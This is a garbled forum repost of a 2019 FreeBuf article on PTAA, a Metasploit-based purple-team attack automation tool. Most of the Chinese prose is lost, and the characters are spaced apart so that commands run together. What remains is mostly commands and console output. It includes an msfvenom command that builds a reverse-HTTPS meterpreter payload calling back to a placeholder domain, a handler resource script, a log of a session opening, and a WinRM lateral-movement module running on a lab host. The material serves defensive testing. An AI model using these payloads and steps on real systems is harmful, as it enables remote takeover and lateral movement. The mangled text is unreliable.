[14057] 2019-05-02_PTAA:一款功能强大的紫队自动化渗透测试工具

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2019-05-02_PTAA:一款功能强大的紫队自动化渗透测试工具 P T A A A l p h a _ h 4 c k   F r e e B u f   2 0 1 9 - 0 5 - 0 2 M I T R E   A T T & C K   T T P s M e t a s p l o i t   F r a m e w o r k - p o s t 1 0 0   T T P s M e t a s p l o i t A P I M e t a s p l o i t e x e c u t e _ p o w e r s h e l l . N E T T T P P o w e r S h e l l M e t a s p l o i t 2 0 1 9 4 9 M e t a s p l o i t M e t a s p l o i t M e t a s p l o i t C 2 - G C P D N S - D N S 使 C l o u d F l a r e C l o u d F l a r e S S L - 使 S S L 使 L e t s E n c r y p t D e b i a n / U b u n t u h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / t r e e / m a s t e r / d o c k e r d o c k e r L H O S T C O M P O S E _ F I L E e x p o r t D N S _ N A M E = " m y t e s t d o m a i n . c o m " w g e t h t t p s : / / d l . e f f . o r g / c e r t b o t - a u t o c h m o d a + x   . / c e r t b o t - a u t o . / c e r t b o t - a u t o - q . / c e r t b o t - a u t o c e r t o n l y   - d   $ D N S _ N A M E   - - s t a n d a l o n e   - - r e g i s t e r - u n s a f e l y - w i t h o u t - e m a i l   - n - - a g r e e - t o s c u r l - f s S L   h t t p s : / / d o w n l o a d . d o c k e r . c o m / l i n u x / u b u n t u / g p g   |   a p t - k e y   a d d   - a p t - k e y f i n g e r p r i n t   0 E B F C D 8 8 a d d - a p t - r e p o s i t o r y       " d e b   [ a r c h = a m d 6 4 ] h t t p s : / / d o w n l o a d . d o c k e r . c o m / l i n u x / d e b i a n   j e s s i e   s t a b l e " a p t - g e t - y   u p d a t e a p t - g e t - y   i n s t a l l   d o c k e r - c e g i t   c l o n e   g i t @ g i t h u b . c o m : p r a e t o r i a n - i n c / p u r p l e - t e a m - a t t a c k - a u t o m a t i o n . g i t c d   p u r p l e - t e a m - a t t a c k - a u t o m a t i o n e c h o " v e r s i o n :   ' 3 ' s e r v i c e s :     m s :         e n v i r o n m e n t :         #   e x a m p l e   o f   s e t t i n g   L H O S T             L H O S T :   0 . 0 . 0 . 0         #   e x a m p l e   o f   a d d i n g   m o r e   p o r t s         p o r t s :             -   8 0 8 0 : 8 0 8 0             -   4 4 3 : 4 4 3             -   8 0 : 8 0 " >   d o c k e r - c o m p o s e . l o c a l . o v e r r i d e . y m l e c h o " C O M P O S E _ F I L E = . / d o c k e r - c o m p o s e . y m l : . / d o c k e r - c o m p o s e . o v e r r i d e . y m l : . / d o c k e r - c o m p o s e . l o c a l . o v e r r i d e . y m l " > >   . e n v
m e t a s p l o i t 使 p a y l o a d 使 使 d o c k e r   - c o m p o s e b u i l d . / d o c k e r / b i n / m s f c o n s o l e c h m o d - R   u g o + r w   ~ / . m s f 4 P a y l o a d c d   ~ c u r l h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r a p i d 7 / m e t a s p l o i t - o m n i b u s / m a s t e r / c o n f i g / t e m p l a t e s / m e t a s p l o i t - f r a m e w o r k - w r a p p e r s / m s f u p d a t e . e r b >   m s f i n s t a l l   & &       c h m o d   7 5 5   m s f i n s t a l l   & &       . / m s f i n s t a l l m s f v e n o m - p   w i n d o w s / x 6 4 / m e t e r p r e t e r _ r e v e r s e _ h t t p s   l h o s t = m y t e s t d o m a i n . c o m   l p o r t = 4 4 3   - a x 6 4   - f   e x e   H a n d l e r S S L C e r t = ~ / p u r p l e - t e a m - a t t a c k - a u t o m a t i o n / M S F . p e m S t a g e r V e r i f y S S L C e r t = t r u e   - o   ~ / a t t a c k - t e s t i n g . e x e $ e c h o   ' < r u b y > p r i n t _ s t a t u s ( " S t a r t i n g H T T P S   l i s t e n e r   f o r   W i n d o w s   x 6 4   m e t e r p r e t e r   o n   p o r t   4 4 3 . " ) r u n _ s i n g l e ( " u s e e x p l o i t / m u l t i / h a n d l e r " ) r u n _ s i n g l e ( " s e t p a y l o a d   w i n d o w s / x 6 4 / m e t e r p r e t e r _ r e v e r s e _ h t t p s " ) r u n _ s i n g l e ( " s e t l p o r t   4 4 3 " ) r u n _ s i n g l e ( " s e t H a n d l e r S S L C e r t   M S F . p e m " ) r u n _ s i n g l e ( " s e t E x i t O n S e s s i o n   f a l s e " ) r u n _ s i n g l e ( " s e t S t a g e r V e r i f y S S L C e r t   t r u e " ) r u n _ s i n g l e ( " e x p l o i t - j " ) < / r u b y > ' >   ~ / p u r p l e - t e a m - a t t a c k - a u t o m a t i o n / s c r i p t s / r e s o u r c e / w i n d o w s _ l i s t e n e r . r c m s f 5 a u x i l i a r y ( s c a n n e r / s m b / i m p a c k e t / s e c r e t s d u m p )   >   r e s o u r c e   w i n d o w s _ l i s t e n e r . r c [ * ] P r o c e s s i n g   / u s r / s r c / m e t a s p l o i t - f r a m e w o r k / s c r i p t s / r e s o u r c e / w i n d o w s _ l i s t e n e r . r c f o r   E R B   d i r e c t i v e s . [ * ] r e s o u r c e   ( / u s r / s r c / m e t a s p l o i t - f r a m e w o r k / s c r i p t s / r e s o u r c e / w i n d o w s _ l i s t e n e r . r c ) > R u b y   C o d e   ( 2 7 0   b y t e s ) [ * ] S t a r t i n g   H T T P S   l i s t e n e r   f o r   W i n d o w s   x 6 4   m e t e r p r e t e r   o n   p o r t   4 4 3 . p a y l o a d = >   w i n d o w s / x 6 4 / m e t e r p r e t e r _ r e v e r s e _ h t t p s l p o r t = >   4 4 3 l h o s t = >   0 . 0 . 0 . 0 [ * ] E x p l o i t   r u n n i n g   a s   b a c k g r o u n d   j o b   0 . [ * ] E x p l o i t   c o m p l e t e d ,   b u t   n o   s e s s i o n   w a s   c r e a t e d . m s f 5 e x p l o i t ( m u l t i / h a n d l e r )   > [ * ] S t a r t e d   H T T P S   r e v e r s e   h a n d l e r   o n   h t t p s : / / 0 . 0 . 0 . 0 : 4 4 3 [ * ] h t t p s : / / 0 . 0 . 0 . 0 : 4 4 3   h a n d l i n g   r e q u e s t   f r o m   1 9 2 . 1 6 8 . 1 3 7 . 1 1 ;   ( U U I D :   c z g d x j 3 z ) R e d i r e c t i n g   s t a g e l e s s   c o n n e c t i o n   f r o m / 2 F - 7 i g 9 O f z t l U G R S O e T J o g L C 1 H D _ 4 Y f 2 R G j - Z l W a P E 6 o C I d O _ n v k _ G C 9 1 3 H - g X l 7 l h X U X Y c n   w i t h U A   ' M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   T r i d e n t / 7 . 0 ;   r v : 1 1 . 0 )   l i k e   G e c k o ' [ * ] h t t p s : / / 0 . 0 . 0 . 0 : 4 4 3   h a n d l i n g   r e q u e s t   f r o m   1 9 2 . 1 6 8 . 1 3 7 . 1 1 ;   ( U U I D :   c z g d x j 3 z ) A t t a c h i n g   o r p h a n e d / s t a g e l e s s   s e s s i o n . . . [ * ] M e t e r p r e t e r   s e s s i o n   1   o p e n e d   ( 1 7 2 . 1 8 . 0 . 3 : 4 4 3   - >   1 9 2 . 1 6 8 . 1 3 7 . 1 1 : 5 2 0 1 2 )   a t 2 0 1 9 - 0 4 - 1 5   1 6 : 1 0 : 2 7   + 0 0 0 0 m s f 5 p o s t ( w i n d o w s / p u r p l e / t 1 0 0 5 )   >   u s e   p o s t / w i n d o w s / p u r p l e / t 1 0 2 8 m s f 5 p o s t ( w i n d o w s / p u r p l e / t 1 0 2 8 )   >   i n f o               N a m e :   W i n d o w s   R e m o t e   M a n a g e m e n t   ( T 1 0 2 8 ) W i n d o w s   -   P u r p l e   T e a m           M o d u l e :   p o s t / w i n d o w s / p u r p l e / t 1 0 2 8       P l a t f o r m :   W i n d o w s               A r c h :               R a n k :   N o r m a l P r o v i d e d b y :     P r a e t o r i a n C o m p a t i b l e s e s s i o n   t y p e s :     M e t e r p r e t e r B a s i c o p t i o n s :     N a m e         C u r r e n t   S e t t i n g                                                                                                             R e q u i r e d     D e s c r i p t i o n     - - - -         - - - - - - - - - - - - - - -                                                                                                             - - - - - - - -     - - - - - - - - - - -     C L E A N U P   t r u e                                                                                                                                   y e s               C l o s e   a n y   i n s t a n c e s   o f c a l c     C M D           w i n r m   q c   - q   &   w i n r m   i   c   w m i c i m v 2 / W i n 3 2 _ P r o c e s s @ { C o m m a n d L i n e = " c a l c " }     y e s               C o m m a n d   t o   e x e c u t e     S E S S I O N   1                                                                                                                                         y e s               T h e   s e s s i o n   t o   r u n   t h i s m o d u l e   o n . D e s c r i p t i o n :     E x e c u t i o n ,   L a t e r a l   M o v e m e n t :   W i n d o w s   R e m o t e M a n a g e m e n t   ( W i n R M )   i s     t h e   n a m e   o f   b o t h   a   W i n d o w s   s e r v i c e   a n d   a p r o t o c o l   t h a t   a l l o w s   a   u s e r     t o   i n t e r a c t   w i t h   a   r e m o t e   s y s t e m   ( e . g . ,   r u n a n   e x e c u t a b l e ,   m o d i f y     t h e   R e g i s t r y ,   m o d i f y   s e r v i c e s ) .   I t   m a y   b e c a l l e d   w i t h   t h e   w i n r m     c o m m a n d   o r   b y   a n y   n u m b e r   o f   p r o g r a m s   s u c h   a s P o w e r S h e l l . R e f e r e n c e s :     C V E :   N o t   a v a i l a b l e     h t t p s : / / a t t a c k . m i t r e . o r g / w i k i / T e c h n i q u e / T 1 0 2 8
*   p r a e t o r i a n F B A l p h a _ h 4 c k F r e e B u f . C O M m s f 5 p o s t ( w i n d o w s / p u r p l e / t 1 0 2 8 )   >   e x p l o i t [ + ] F o u n d   a n   i n s t a n c e   o f   C a l c u l a t o r   r u n n i n g .   K i l l i n g   i t . [ * ] E x e c u t i n g   ' c m d   / c   w i n r m   q c   - q   &   w i n r m   i   c   w m i c i m v 2 / W i n 3 2 _ P r o c e s s @ { C o m m a n d L i n e = " c a l c " } '   o n   # < S e s s i o n : m e t e r p r e t e r 1 9 2 . 1 6 8 . 1 3 7 . 1 1 : 5 2 0 1 2   ( 1 0 . 0 . 2 . 1 5 )   " P U R P L E D E V A d m i n i s t r a t o r   @ D E S K T O P - 1 " > [ ! ] W i n R M   s e r v i c e   i s   a l r e a d y   r u n n i n g   o n   t h i s   m a c h i n e . W S M a n F a u l t         M e s s a g e                 P r o v i d e r F a u l t                         W S M a n F a u l t                                 M e s s a g e   =   W i n R M   f i r e w a l l   e x c e p t i o n w i l l   n o t   w o r k   s i n c e   o n e   o f   t h e   n e t w o r k   c o n n e c t i o n   t y p e s   o n   t h i s   m a c h i n e   i s   s e t t o   P u b l i c .   C h a n g e   t h e   n e t w o r k   c o n n e c t i o n   t y p e   t o   e i t h e r   D o m a i n   o r   P r i v a t e   a n d t r y   a g a i n . E r r o r n u m b e r :     - 2 1 4 4 1 0 8 1 8 3   0 x 8 0 3 3 8 1 6 9 W i n R M f i r e w a l l   e x c e p t i o n   w i l l   n o t   w o r k   s i n c e   o n e   o f   t h e   n e t w o r k   c o n n e c t i o n   t y p e s   o n t h i s   m a c h i n e   i s   s e t   t o   P u b l i c .   C h a n g e   t h e   n e t w o r k   c o n n e c t i o n   t y p e   t o   e i t h e r D o m a i n   o r   P r i v a t e   a n d   t r y   a g a i n . c r e a t e _ O U T P U T         P r o c e s s I d   =   5 4 5 6         R e t u r n V a l u e   =   0 [ + ] M o d u l e   T 1 0 2 8 W   e x e c u t i o n   s u c c e s s f u l . [ + ] F o u n d   a n   i n s t a n c e   o f   C a l c u l a t o r   r u n n i n g .   K i l l i n g   i t . [ + ] F o u n d   a n   i n s t a n c e   o f   C a l c u l a t o r   r u n n i n g .   K i l l i n g   i t . [ * ] P o s t   m o d u l e   e x e c u t i o n   c o m p l e t e d m s f 5 p o s t ( w i n d o w s / p u r p l e / t 1 0 2 8 )   >
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则